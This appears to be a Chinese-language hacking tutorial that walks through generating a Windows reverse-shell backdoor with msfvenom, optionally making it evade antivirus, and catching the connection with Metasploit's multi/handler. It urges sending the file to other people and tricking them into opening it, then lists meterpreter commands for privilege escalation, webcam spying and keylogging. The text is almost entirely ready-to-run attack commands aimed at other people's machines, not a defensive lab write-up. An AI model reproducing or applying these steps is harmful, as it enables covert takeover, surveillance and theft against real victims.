1、首先在kali上制作一个后门程序。文件名为:openme.exe
命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=50000 -f exe -o openme.exe
#本地监听地址及端口号:10.10.10.128:50000
2、为生成的文件 openme.exe 赋予可执行的权限,如果有必要可以对该文件执行免杀
命令:
chmod 777 openme.exe
3、打开msf,加载exploit/multi/handler模块,同时设置本地主机地址,本地端口
命令:
msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 10.10.10.128
msf exploit(handler) > set lport 50000
4、开始执行渗透攻击并监听
命令:
msf exploit(handler) > exploit -z -j
5、此时,你可以将文件发给其他人,利用社会工程学知识让别人在他的win7系统上打开该文件,那么你的目的就达到了
下面就是我在win7虚拟机中的文件,然后运行该文件
6、后门程序反向连接到msf,msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。
如图你在你kali上会有一个session。你攻陷了别人的主机并拿到了shell,还有session信息。
命令:
msf exploit(handler) > sessions
msf exploit(handler) > sessions -i 1
meterpreter > shell
7、最后恭喜你就这样hacked别人的win7系统,如果你进一步学习Windows系统下的命令行操作,你就可以随意控制别人的主机了。
下面附上meterpreter常用的命令
getsystem #会自动利用各种各样的系统漏洞来进行权限提升
migrate #进程id进程迁移
background #把当前的会话设置为背景,需要的时候在启用
getuid #查看对方正在运行的用户
ps #列出所有的进程
getpid #返回运行meterpreter的id号
sysinfo #产看系统信息和体系结构
shell #切换到cmd的系统权限方式
exit #退出shell会话返回meterpreter或终止meterpreter
getdesktop截取目标主机当前桌面会话窗口
run webcam -p /var/www #在/var/www目录监控目标主机的摄像头
keylog_recorder #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘
